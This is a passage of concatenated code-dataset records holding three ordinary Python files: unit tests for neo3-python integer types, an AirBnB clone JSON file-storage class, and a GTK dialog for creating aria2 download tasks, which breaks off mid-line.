test_compare_to(self):\n x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n y = UIntBase(num_bytes=3, data=bytearray.fromhex('112233'))\n z = UIntBase(num_bytes=2, data=bytearray.fromhex('1133'))\n xx = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n\n # test invalid type\n with self.assertRaises(TypeError) as context:\n x._compare_to(None)\n\n expected = \"Cannot compare UIntBase to type NoneType\"\n self.assertEqual(expected, str(context.exception))\n\n # test invalid length\n with self.assertRaises(ValueError) as context:\n x._compare_to(y)\n\n expected = \"Cannot compare UIntBase with length 2 to UIntBase with length 3\"\n self.assertEqual(expected, str(context.exception))\n\n # test data difference ('22' < '33')\n self.assertEqual(-1, x._compare_to(z))\n # test data difference ('33' > '22')\n self.assertEqual(1, z._compare_to(x))\n # test data equal\n self.assertEqual(0, x._compare_to(xx))\n\n def test_rich_comparison_methods(self):\n x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n z = UIntBase(num_bytes=2, data=bytearray.fromhex('1133'))\n xx = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n\n self.assertTrue(x < z)\n self.assertTrue(z > x)\n self.assertTrue(x <= xx)\n self.assertTrue(x >= xx)\n\nclass UInt160_and_256Test(TestCase):\n def test_zero(self):\n uint160 = UInt160.zero()\n self.assertEqual(20, len(uint160.to_array()))\n\n uint256 = UInt256.zero()\n self.assertEqual(32, len(uint256.to_array()))\n\n def test_from_string_wrong_length(self):\n with self.assertRaises(ValueError) as ctx:\n UInt160.from_string(\"1122\")\n self.assertEqual(\"Invalid UInt160 Format: 4 chars != 40 chars\", str(ctx.exception))\n\n with self.assertRaises(ValueError) as ctx:\n UInt256.from_string(\"1122\")\n self.assertEqual(\"Invalid UInt256 Format: 4 chars != 64 chars\", str(ctx.exception))\n\n def test_from_string_various(self):\n uint160 = UInt160.from_string(\"11\" * 20)\n expected_data_uint160 = bytearray([0x11] * 20)\n self.assertEqual(expected_data_uint160, uint160.to_array())\n\n uint256 = UInt256.from_string(\"11\" * 32)\n expected_data_uint256 = bytearray([0x11] * 32)\n self.assertEqual(expected_data_uint256, uint256.to_array())\n\n\n uint160_from_bytes = UInt160.deserialize_from_bytes(expected_data_uint160)\n self.assertEqual(expected_data_uint160, uint160_from_bytes.to_array())\n\n uint256_from_bytes = UInt256.deserialize_from_bytes(expected_data_uint256)\n self.assertEqual(expected_data_uint256, uint256_from_bytes.to_array())\n\n # test deserialize with too much data\n data_uint160 = bytearray(21 * [0x11])\n uint160_from_bytes = UInt160.deserialize_from_bytes(data_uint160)\n self.assertEqual(data_uint160[:20], uint160_from_bytes.to_array())\n\n data_uint256 = bytearray(33 * [0x11])\n uint256_from_bytes = UInt256.deserialize_from_bytes(data_uint256)\n self.assertEqual(expected_data_uint256[:32], uint256_from_bytes.to_array())\n\n # test deserialize with too little data\n data_uint160 = bytearray(19 * [0x11])\n data_uint256 = bytearray(31 * [0x11])\n with self.assertRaises(ValueError) as ctx:\n UInt160.deserialize_from_bytes(data_uint160)\n self.assertEqual(\"Insufficient data 19 bytes is less than the required 20\", str(ctx.exception))\n\n with self.assertRaises(ValueError) as ctx:\n UInt256.deserialize_from_bytes(data_uint256)\n self.assertEqual(\"Insufficient data 31 bytes is less than the required 32\", str(ctx.exception))\n\n def test_deserialize_from_stream(self):\n data_uint160 = bytearray(20 * [0x11])\n data_uint256 = bytearray(32 * [0x11])\n\n with serialization.BinaryReader(data_uint160) as br:\n # we explicitly call deserialize, instead of br.read_uint160() for coverage\n uint160 = UInt160()\n uint160.deserialize(br)\n self.assertEqual(data_uint160, uint160._data)\n\n with serialization.BinaryReader(data_uint256) as br:\n uint256 = UInt256()\n uint256.deserialize(br)\n self.assertEqual(data_uint256, uint256._data)\n\n def test_serialize_to_stream(self):\n data_uint160 = bytearray(20 * [0x11])\n data_uint256 = bytearray(32 * [0x11])\n uint160 = UInt160(data_uint160)\n uint256 = UInt256(data_uint256)\n\n with serialization.BinaryWriter() as bw:\n bw.write_serializable(uint160)\n self.assertEqual(data_uint160, bw._stream.getvalue())\n\n with serialization.BinaryWriter() as bw:\n bw.write_serializable(uint256)\n self.assertEqual(data_uint256, bw._stream.getvalue())\n","repo_name":"CityOfZion/neo3-python","sub_path":"tests/core/test_types.py","file_name":"test_types.py","file_ext":"py","file_size_in_byte":13708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15194530505","text":"#!/usr/bin/python3\n\"\"\"\"\"base_model.py contains the model superclass that will serve for\nall classes in the airBnN project\n\"\"\"\nimport datetime\nimport json\nimport os\n\n\nclass FileStorage:\n \"\"\"class used to store user data in json format\"\"\"\n __file_path = \"file.json\"\n __objects = {}\n\n def all(self):\n \"\"\"returns all objects in file\"\"\"\n return FileStorage.__objects\n\n def new(self, obj):\n \"\"\"used to store a new object in __object dict\"\"\"\n obj_key = type(obj).__name__ + '.' + obj.id\n FileStorage.__objects[obj_key] = obj\n\n def save(self):\n \"\"\" Serializes __objects to JSON file.\"\"\"\n with open(FileStorage.__file_path, \"w\", encoding=\"utf-8\") as fileName:\n object_dict = {k: v.to_dict()\n for k, v in FileStorage.__objects.items()}\n json.dump(object_dict, fileName)\n\n def reload(self):\n \"\"\"Deserializes JSON file into __objects.\"\"\"\n if not os.path.isfile(FileStorage.__file_path):\n return\n with open(FileStorage.__file_path, \"r\", encoding=\"utf-8\") as fileName:\n obj_dict = json.load(fileName)\n obj_dict = {k: self.classes()[v['__class__']](**v)\n for k, v in obj_dict.items()}\n FileStorage.__objects = obj_dict\n\n def classes(self):\n \"\"\"Returns a dictionary of valid classes and their references.\"\"\"\n from models.base_model import BaseModel\n from models.user import User\n from models.state import State\n from models.city import City\n from models.amenity import Amenity\n from models.place import Place\n from models.review import Review\n\n classes = {\"BaseModel\": BaseModel,\n \"User\": User,\n \"State\": State,\n \"City\": City,\n \"Amenity\": Amenity,\n \"Place\": Place,\n \"Review\": Review}\n return classes\n\n def attributes(self):\n \"\"\"Returns the valid attributes of all classes\"\"\"\n attributes = {\n \"BaseModel\": {\n \"id\": str,\n \"created_at\": datetime.datetime,\n \"updated_at\": datetime.datetime},\n \"User\": {\n \"email\": str,\n \"password\": str,\n \"first_name\": str,\n \"last_name\": str},\n \"State\": {\n \"name\": str},\n \"City\": {\n \"state_id\": str,\n \"name\": str},\n \"Amenity\": {\n \"name\": str},\n \"Place\": {\n \"city_id\": str,\n \"user_id\": str,\n \"name\": str,\n \"description\": str,\n \"number_rooms\": int,\n \"number_bathrooms\": int,\n \"max_guest\": int,\n \"price_by_night\": int,\n \"latitude\": float,\n \"longitude\": float,\n \"amenity_ids\": list},\n \"Review\": {\n \"place_id\": str,\n \"user_id\": str,\n \"text\": str}\n }\n return attributes\n","repo_name":"DT-Brandon/AirBnB_clone","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"6211350822","text":"import os\nimport xmlrpc.client\n\nfrom gi.repository import Gtk, Gio\nfrom gi.repository.Gio import SettingsBindFlags as BindFlags\n\nfrom yaner.Task import Task\nfrom yaner.ui.Widgets import RightAlignedLabel, AlignedExpander\nfrom yaner.ui.Widgets import MetafileChooserButton, FileChooserEntry, URIsView\nfrom yaner.ui.Widgets import HORIZONTAL, VERTICAL, Box, Grid\nfrom yaner.ui.PoolTree import PoolModel\nfrom yaner.ui.CategoryComboBox import CategoryFilterModel, CategoryComboBox\nfrom yaner.utils.Logging import LoggingMixin\n\n_BT_FILTER_NAME = _('Torrent Files')\n_ML_FILTER_NAME = _('Metalink Files')\n_BT_MIME_TYPES = {'application/x-bittorrent'}\n_ML_MIME_TYPES = {'application/metalink4+xml', 'application/metalink+xml'}\n_RESPONSE_RESET = -1\n_RESPONSE_SAVE = -2\n\nclass _Option(object):\n \"\"\"An widget wrapper for convert between aria2c needed format and widget\n values.\n \"\"\"\n def __init__(self, widget, property_, mapper):\n self.widget = widget\n self.property_ = property_\n self.mapper = mapper\n\n @property\n def value(self):\n \"\"\"Value for used in XML-RPC.\"\"\"\n widget_value = self.widget.get_property(self.property_)\n return self.mapper(widget_value)\n\n @property\n def widget_value(self):\n \"\"\"Get the value of the widget.\"\"\"\n return self.widget.get_property(self.property_)\n\n @widget_value.setter\n def widget_value(self, value):\n \"\"\"Set the value of the widget.\"\"\"\n self.widget.set_property(self.property_, value)\n\n ## Mappers\n default_mapper = lambda x: x\n string_mapper = lambda x: x\n bool_mapper = lambda x: 'true' if x else 'false'\n int_mapper = lambda x: str(int(x))\n float_mapper = lambda x: str(float(x))\n kib_mapper = lambda x: str(int(x) * 1024)\n mib_mapper = lambda x: str(int(x) * 1024 * 1024)\n prioritize_mapper = lambda x: 'head, tail' if x else ''\n\nclass _Settings(Gio.Settings):\n \"\"\"GSettings class for options.\"\"\"\n def __init__(self, schema_id, delay=False):\n Gio.Settings.__init__(self, schema_id)\n\n if delay:\n # Don't apply changes to dconf until apply() is called\n self.delay()\n\n self._delay = delay\n\n def bind(self, options, flags=BindFlags.DEFAULT):\n keys = self.list_keys()\n for key, option in options.items():\n if key in keys:\n Gio.Settings.bind(self, key, option.widget, option.property_, flags)\n\n def reset(self, options):\n keys = self.list_keys()\n for key, option in options.items():\n if key in keys:\n Gio.Settings.reset(self, key)\n # When in delayed writing mode, widget values doesn't update\n # when the settings isn't different with the default value,\n # so update it manually\n option.widget_value = self.get_value(key).unpack()\n self.apply()\n\nclass _TaskNewUI(LoggingMixin):\n \"\"\"Base class for the UIs of the new task dialog.\"\"\"\n\n def __init__(self, task_options, expander_label):\n LoggingMixin.__init__(self)\n\n self._settings = _Settings('com.kissuki.yaner.task', delay=True)\n self._task_options = task_options.copy()\n\n expander = AlignedExpander(expander_label)\n self._uris_expander = expander\n\n vbox = Box(VERTICAL)\n expander.add(vbox)\n self._content_box = vbox\n\n @property\n def uris_expander(self):\n return self._uris_expander\n\n @property\n def aria2_options(self):\n return {key: option.value for (key, option) in self._task_options.items()}\n\n def activate(self, new_options):\n \"\"\"When the UI changed to this one, bind and update the setting widgets.\"\"\"\n self._settings.bind(self._task_options)\n for key, option in self._task_options.items():\n try:\n option.widget_value = new_options[key]\n except KeyError:\n pass\n self._uris_expander.show_all()\n\n def deactivate(self):\n \"\"\"When the UI changed from this one, unbind the properties.\"\"\"\n self._settings.revert()\n\n def response(self, response_id):\n \"\"\"When dialog responsed, create new task. Returning if the dialog should\n be kept showing.\n \"\"\"\n if response_id in (Gtk.ResponseType.CANCEL, Gtk.ResponseType.DELETE_EVENT):\n return False\n elif response_id == _RESPONSE_RESET:\n self._settings.reset(self._task_options)\n return True\n elif response_id == _RESPONSE_SAVE:\n self._settings.apply()\n return True\n else:\n return True\n\nclass _TaskNewDefaultUI(_TaskNewUI):\n \"\"\"Default UI of the new task dialog.\"\"\"\n def __init__(self, task_options, parent):\n _TaskNewUI.__init__(self, task_options,\n expander_label= _('URIs/Torrent/Metalink File')\n )\n\n box = self._content_box\n\n tooltip = _('Enter URIs here or select Torrent/Metalink files'\n ' by clicking the icon on the right side.')\n secondary_tooltip = _('Select Torrent/Metalink Files')\n entry = FileChooserEntry(secondary_tooltip,\n parent,\n Gtk.FileChooserAction.OPEN,\n update_entry=False,\n mime_list=(\n (_BT_FILTER_NAME, _BT_MIME_TYPES),\n (_ML_FILTER_NAME, _ML_MIME_TYPES),\n ),\n truncate_multiline=True,\n tooltip_text=tooltip,\n secondary_icon_tooltip_text=secondary_tooltip,\n )\n entry.set_size_request(350, -1)\n box.pack_start(entry)\n self._task_options['uris'] = _Option(entry, 'text', _Option.string_mapper)\n\n self.uri_entry = entry\n\n def activate(self, options):\n _TaskNewUI.activate(self, options)\n self.uri_entry.grab_focus()\n\nclass _TaskNewNormalUI(_TaskNewUI):\n \"\"\"Normal UI of the new task dialog.\"\"\"\n def __init__(self, task_options):\n _TaskNewUI.__init__(self, task_options,\n expander_label=_('URI(s)')\n )\n\n box = self._content_box\n\n tooltip = _('Specify HTTP(S)/FTP URI:\\n'\n '\\thttp://www.example.com/bar.iso\\n\\n'\n 'Add some mirrors for that file:\\n'\n '\\thttps://www.mirror1.com/foo/bar.iso\\n'\n '\\tftp://www.mirror2.com/foo/bar.iso\\n\\n'\n 'Or use Magnet URI(Does not support mirrors):\\n'\n '\\tmagnet:?xt=urn:sha1:YNCKHTQCWBTRNJIV4WNAE52SJUQCZO5C\\n'\n )\n uris_view = URIsView(tooltip_markup=tooltip)\n uris_view.set_size_request(350, 70)\n box.pack_start(uris_view)\n self._task_options['uris'] = _Option(uris_view, 'uris',\n _Option.default_mapper)\n\n hbox = Box(HORIZONTAL)\n box.pack_start(hbox)\n\n # Rename\n tooltip = _('Rename the downloaded file to this name.')\n\n label = RightAlignedLabel(_('Rename:'), tooltip_text=tooltip)\n hbox.pack_start(label, expand=False)\n\n entry = Gtk.Entry(tooltip_text=tooltip, activates_default=True)\n hbox.pack_start(entry)\n self._task_options['out'] = _Option(entry, 'text', _Option.string_mapper)\n\n # Connections\n tooltip = _('The max connections to download the file.')\n\n label = RightAlignedLabel(_('Connections:'), tooltip_text=tooltip)\n hbox.pack_start(label, expand=False)\n\n adjustment = Gtk.Adjustment(lower=1, upper=1024, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n hbox.pack_start(spin_button)\n self._task_options['split'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n self._uris_view = uris_view\n\n @property\n def uris_view(self):\n return self._uris_view\n\n def activate(self, options):\n _TaskNewUI.activate(self, options)\n self._uris_view.grab_focus()\n\n def response(self, response_id):\n if response_id == Gtk.ResponseType.OK:\n options = self.aria2_options\n\n # Workaround for aria2 bug#3527521\n options.pop('bt-prioritize-piece')\n\n category = options.pop('category')\n uris = options.pop('uris')\n if not uris:\n return True\n\n name = options['out'] if options['out'] else os.path.basename(uris[0])\n\n Task(name=name, uris=uris, options=options, category=category).start()\n\n return False\n else:\n return _TaskNewUI.response(self, response_id)\n\nclass _TaskNewBTUI(_TaskNewUI):\n \"\"\"BT UI of the new task dialog.\"\"\"\n def __init__(self, task_options):\n _TaskNewUI.__init__(self, task_options,\n expander_label=_('Torrent File')\n )\n\n box = self._content_box\n\n button = MetafileChooserButton(title=_('Select torrent file'),\n mime_types=_BT_MIME_TYPES,\n )\n button.set_size_request(350, -1)\n box.pack_start(button)\n self._task_options['torrent_filename'] = _Option(button, 'filename',\n _Option.string_mapper)\n\n def response(self, response_id):\n if response_id == Gtk.ResponseType.OK:\n options = self.aria2_options\n\n torrent_filename = options.pop('torrent_filename')\n if torrent_filename is None:\n return True\n else:\n name = os.path.basename(torrent_filename)\n with open(torrent_filename, 'br') as torrent_file:\n torrent = xmlrpc.client.Binary(torrent_file.read())\n\n uris = options.pop('uris')\n category = options.pop('category')\n\n Task(name=name, torrent=torrent, uris=uris,\n options=options, category=category).start()\n\n return False\n else:\n return _TaskNewUI.response(self, response_id)\n\nclass _TaskNewMLUI(_TaskNewUI):\n \"\"\"Metalink UI of the new task dialog.\"\"\"\n def __init__(self, task_options):\n _TaskNewUI.__init__(self, task_options,\n expander_label=_('Metalink File')\n )\n\n box = self._content_box\n\n button = MetafileChooserButton(title=_('Select metalink file'),\n mime_types=_ML_MIME_TYPES,\n )\n button.set_size_request(350, -1)\n box.pack_start(button)\n self._task_options['metalink_filename'] = _Option(button, 'filename',\n _Option.string_mapper)\n\n def response(self, response_id):\n if response_id == Gtk.ResponseType.OK:\n options = self.aria2_options\n\n # Workaround for aria2 bug#3527521\n options.pop('uris')\n\n metalink_filename = options.pop('metalink_filename')\n if metalink_filename is None:\n return True\n else:\n name = os.path.basename(metalink_filename)\n with open(metalink_filename, 'br') as metalink_file:\n metafile = xmlrpc.client.Binary(metalink_file.read())\n\n category = options.pop('category')\n\n Task(name=name, metafile=metafile, options=options,\n category=category).start()\n return False\n else:\n return _TaskNewUI.response(self, response_id)\n\nclass TaskNewDialog(Gtk.Dialog, LoggingMixin):\n \"\"\"Dialog for creating new tasks.\"\"\"\n def __init__(self, pool_model, *args, **kwargs):\n Gtk.Dialog.__init__(self, title=_('Create New Task'), *args, **kwargs)\n LoggingMixin.__init__(self)\n\n self._ui = None\n self._default_ui = None\n self._normal_ui = None\n self._bt_ui = None\n self._ml_ui = None\n\n self._task_options = {}\n\n ### Action Area\n action_area = self.get_action_area()\n action_area.set_layout(Gtk.ButtonBoxStyle.START)\n\n button = Gtk.Button.new_from_stock(Gtk.STOCK_CANCEL)\n self.add_action_widget(button, Gtk.ResponseType.CANCEL)\n action_area.set_child_secondary(button, True)\n\n image = Gtk.Image.new_from_stock(Gtk.STOCK_GO_DOWN, Gtk.IconSize.BUTTON)\n button = Gtk.Button(_('_Download'), image=image, use_underline=True)\n self.add_action_widget(button, Gtk.ResponseType.OK)\n action_area.set_child_secondary(button, True)\n\n advanced_buttons = []\n\n image = Gtk.Image.new_from_stock(Gtk.STOCK_UNDO, Gtk.IconSize.BUTTON)\n button = Gtk.Button(_('_Reset Settings'), image=image, use_underline=True)\n button.set_no_show_all(True)\n self.add_action_widget(button, _RESPONSE_RESET)\n advanced_buttons.append(button)\n\n image = Gtk.Image.new_from_stock(Gtk.STOCK_SAVE, Gtk.IconSize.BUTTON)\n button = Gtk.Button(_('_Save Settings'), image=image, use_underline=True)\n button.set_no_show_all(True)\n self.add_action_widget(button, _RESPONSE_SAVE)\n advanced_buttons.append(button)\n\n ### Content Area\n content_area = self.get_content_area()\n\n vbox = Box(VERTICAL)\n content_area.add(vbox)\n self._main_vbox = vbox\n\n ## Save to\n expander = AlignedExpander(_('Save to...'))\n expander.connect_after('activate', self.update_size)\n vbox.pack_start(expander)\n self.save_expander = expander\n\n hbox = Box(HORIZONTAL)\n expander.add(hbox)\n\n # Directory\n tooltip = _('Select the directory to save files')\n entry = FileChooserEntry(_('Select download directory'),\n self,\n Gtk.FileChooserAction.SELECT_FOLDER,\n tooltip_text=tooltip\n )\n hbox.pack_end(entry)\n self._task_options['dir'] = _Option(entry, 'text', _Option.string_mapper)\n\n model = CategoryFilterModel(pool_model)\n combo_box = CategoryComboBox(model, self)\n combo_box.connect('changed', self._on_category_cb_changed, entry)\n combo_box.set_active(0)\n hbox.pack_start(combo_box)\n self._task_options['category'] = _Option(combo_box, 'category',\n _Option.default_mapper)\n\n ## Advanced\n expander = AlignedExpander(_('Advanced'), expanded=False)\n expander.connect_after('activate',\n self._on_advanced_expander_activated,\n advanced_buttons)\n expander.connect_after('activate', self.update_size)\n vbox.pack_end(expander)\n self.advanced_expander = expander\n\n notebook = Gtk.Notebook()\n expander.add(notebook)\n\n ## Normal Task Page\n label = Gtk.Label(_('Normal Task'))\n vbox = Box(VERTICAL, border_width=5)\n notebook.append_page(vbox, label)\n\n grid = Grid()\n vbox.pack_start(grid, expand=False)\n\n # Speed Limit\n tooltip = _('Upload speed limit, in KiB/s.')\n\n label = RightAlignedLabel(_('Upload Limit:'), tooltip_text=tooltip)\n grid.attach(label, 0, 0)\n\n adjustment = Gtk.Adjustment(lower=0, upper=4096, step_increment=10)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 0)\n self._task_options['max-upload-limit'] = _Option(spin_button, 'value',\n _Option.kib_mapper)\n\n tooltip = _('Download speed limit, in KiB/s.')\n\n label = RightAlignedLabel(_('Download Limit:'), tooltip_text=tooltip)\n grid.attach(label, 2, 0)\n\n adjustment = Gtk.Adjustment(lower=0, upper=4096, step_increment=10)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 3, 0)\n self._task_options['max-download-limit'] = _Option(spin_button, 'value',\n _Option.kib_mapper)\n\n # Retry\n tooltip = _('Number of retries.')\n\n label = RightAlignedLabel(_('Max Retries:'), tooltip_text=tooltip)\n grid.attach(label, 0, 1)\n\n adjustment = Gtk.Adjustment(lower=0, upper=60, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 1)\n self._task_options['max-tries'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n tooltip = _('Time to wait before retries, in seconds.')\n\n label = RightAlignedLabel(_('Retry Interval:'), tooltip_text=tooltip)\n grid.attach(label, 2, 1)\n\n adjustment = Gtk.Adjustment(lower=0, upper=60, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 3, 1)\n self._task_options['retry-wait'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n # Timeout\n tooltip = _('Download timeout, in seconds.')\n\n label = RightAlignedLabel(_('Timeout:'), tooltip_text=tooltip)\n grid.attach(label, 0, 2)\n\n adjustment = Gtk.Adjustment(lower=1, upper=300, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 2)\n self._task_options['timeout'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n tooltip = _('Timeout to connect HTTP/FTP/proxy server, in seconds.')\n\n label = RightAlignedLabel(_('Connect Timeout:'), tooltip_text=tooltip)\n grid.attach(label, 2, 2)\n\n adjustment = Gtk.Adjustment(lower=1, upper=300, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 3, 2)\n self._task_options['connect-timeout'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n # Split and Connections\n tooltip = _('Minimal size to split the file into pieces, in MiB.')\n\n label = RightAlignedLabel(_('Split Size:'), tooltip_text=tooltip)\n grid.attach(label, 0, 3)\n\n adjustment = Gtk.Adjustment(lower=1, upper=1024, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 3)\n self._task_options['min-split-size'] = _Option(spin_button, 'value',\n _Option.mib_mapper)\n\n tooltip = _('Max connections per server.')\n label = RightAlignedLabel(_('Per Server Connections:'), tooltip_text=tooltip)\n grid.attach(label, 2, 3)\n\n adjustment = Gtk.Adjustment(lower=1, upper=10, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 3, 3)\n self._task_options['max-connection-per-server'] = _Option(\n spin_button, 'value', _Option.int_mapper)\n\n # Referer\n tooltip = _('The referrer page of the download.')\n label = RightAlignedLabel(_('Referer:'), tooltip_text=tooltip)\n grid.attach(label, 0, 4)\n\n entry = Gtk.Entry(activates_default=True, tooltip_text=tooltip)\n grid.attach(entry, 1, 4, 3, 1)\n self._task_options['referer'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n # Header\n label = RightAlignedLabel(_('HTTP Header:'))\n grid.attach(label, 0, 5)\n\n entry = Gtk.Entry(activates_default=True)\n grid.attach(entry, 1, 5, 3, 1)\n self._task_options['header'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n ## BT Task Page\n label = Gtk.Label(_('BitTorrent'))\n vbox = Box(VERTICAL, border_width=5)\n notebook.append_page(vbox, label)\n\n grid = Grid()\n vbox.pack_start(grid, expand=False)\n\n # Limit\n label = RightAlignedLabel(_('Max open files:'))\n grid.attach(label, 0, 0)\n\n adjustment = Gtk.Adjustment(lower=1, upper=1024, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True)\n grid.attach(spin_button, 1, 0)\n self._task_options['bt-max-open-files'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n label = RightAlignedLabel(_('Max peers:'))\n grid.attach(label, 2, 0)\n\n adjustment = Gtk.Adjustment(lower=1, upper=1024, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True)\n grid.attach(spin_button, 3, 0)\n self._task_options['bt-max-peers'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n # Seed\n tooltip = _('Seed time, in minutes')\n\n label = RightAlignedLabel(_('Seed time:'), tooltip_text=tooltip)\n grid.attach(label, 0, 1)\n\n adjustment = Gtk.Adjustment(lower=0, upper=7200, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 1)\n self._task_options['seed-time'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n label = RightAlignedLabel(_('Seed ratio:'))\n grid.attach(label, 2, 1)\n\n adjustment = Gtk.Adjustment(lower=0, upper=20, step_increment=.1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True, digits=1)\n grid.attach(spin_button, 3, 1)\n self._task_options['seed-ratio'] = _Option(spin_button, 'value',\n _Option.float_mapper)\n\n # Timeout\n tooltip = _('Download timeout, in seconds.')\n\n label = RightAlignedLabel(_('Timeout:'), tooltip_text=tooltip)\n grid.attach(label, 0, 2)\n\n adjustment = Gtk.Adjustment(lower=1, upper=300, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 2)\n self._task_options['bt-tracker-timeout'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n tooltip = _('Timeout to establish connection to trackers, in seconds.')\n\n label = RightAlignedLabel(_('Connect Timeout:'), tooltip_text=tooltip)\n grid.attach(label, 2, 2)\n\n adjustment = Gtk.Adjustment(lower=1, upper=300, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 3, 2)\n self._task_options['bt-tracker-connect-timeout'] = _Option(\n spin_button, 'value', _Option.int_mapper)\n\n tooltip = _('Try to download first and last pieces first.')\n label = RightAlignedLabel(_('Preview Mode:'), tooltip_text=tooltip)\n grid.attach(label, 0, 3)\n switch = Gtk.Switch(tooltip_text=tooltip)\n grid.attach(switch, 1, 3)\n self._task_options['bt-prioritize-piece'] = _Option(\n switch, 'active', _Option.prioritize_mapper)\n\n tooltip = _('Convert downloaded torrent files to BitTorrent tasks.')\n label = RightAlignedLabel(_('Follow Torrent:'), tooltip_text=tooltip)\n grid.attach(label, 2, 3)\n switch = Gtk.Switch(tooltip_text=tooltip)\n grid.attach(switch, 3, 3)\n self._task_options['follow-torrent'] = _Option(switch, 'active',\n _Option.bool_mapper)\n\n # Mirrors\n tooltip = _('For single file torrents, a mirror can be a ' \\\n 'complete URI pointing to the resource or if the mirror ' \\\n 'ends with /, name in torrent file is added. For ' \\\n 'multi-file torrents, name and path in torrent are ' \\\n 'added to form a URI for each file.')\n expander = AlignedExpander(_('Mirrors'), expanded=False, tooltip_text=tooltip)\n expander.connect_after('activate', self.update_size)\n grid.attach(expander, 0, 4, 4, 1)\n #vbox.pack_start(expander, expand=False)\n\n uris_view = URIsView()\n uris_view.set_size_request(-1, 70)\n expander.add(uris_view)\n self._task_options['uris'] = _Option(uris_view, 'uris',\n _Option.default_mapper)\n\n ## Metalink Page\n label = Gtk.Label(_('Metalink'))\n vbox = Box(VERTICAL, border_width=5)\n notebook.append_page(vbox, label)\n\n grid = Grid(halign=Gtk.Align.CENTER)\n vbox.pack_start(grid, expand=False)\n\n label = RightAlignedLabel(_('Preferred locations:'))\n grid.attach(label, 0, 0)\n\n entry = Gtk.Entry()\n grid.attach(entry, 1, 0)\n self._task_options['metalink-location'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('Language:'))\n grid.attach(label, 0, 1)\n\n entry = Gtk.Entry()\n grid.attach(entry, 1, 1)\n self._task_options['metalink-language'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('Version:'))\n grid.attach(label, 0, 2)\n\n entry = Gtk.Entry()\n grid.attach(entry, 1, 2)\n self._task_options['metalink-version'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('OS:'))\n grid.attach(label, 0, 3)\n\n entry = Gtk.Entry()\n grid.attach(entry, 1, 3)\n self._task_options['metalink-os'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n tooltip = _('Convert downloaded metalink files to Metalink tasks.')\n\n label = RightAlignedLabel(_('Follow Metalink:'), tooltip_text=tooltip)\n grid.attach(label, 0, 4)\n\n switch = Gtk.Switch(tooltip_text=tooltip)\n grid.attach(switch, 1, 4)\n self._task_options['follow-metalink'] = _Option(switch, 'active',\n _Option.bool_mapper)\n\n ## Miscellaneous Page\n label = Gtk.Label(_('Miscellaneous'))\n vbox = Box(VERTICAL, border_width=5)\n notebook.append_page(vbox, label)\n\n grid = Grid()\n vbox.pack_start(grid, expand=False)\n\n # Overwrite and Rename\n tooltip = _(\"Restart download from scratch if the corresponding\"\n \" control file doesn't exist.\")\n\n label = RightAlignedLabel(_('Allow Overwrite:'), tooltip_text=tooltip)\n grid.attach(label, 0, 0)\n\n switch = Gtk.Switch(tooltip_text=tooltip)\n grid.attach(switch, 1, 0)\n self._task_options['allow-overwrite'] = _Option(switch, 'active',\n _Option.bool_mapper)\n\n tooltip = _('Rename file name if the same file already exists.')\n\n label = RightAlignedLabel(_('Auto Rename Files:'), tooltip_text=tooltip)\n grid.attach(label, 2, 0)\n\n switch = Gtk.Switch(tooltip_text=tooltip)\n grid.attach(switch, 3, 0)\n self._task_options['auto-file-renaming'] = _Option(switch, 'active',\n _Option.bool_mapper)\n\n tooltip = _('Format: [http://][USER:PASSWORD@]HOST[:PORT]')\n label = RightAlignedLabel(_('Proxy:'), tooltip_text=tooltip)\n grid.attach(label, 0, 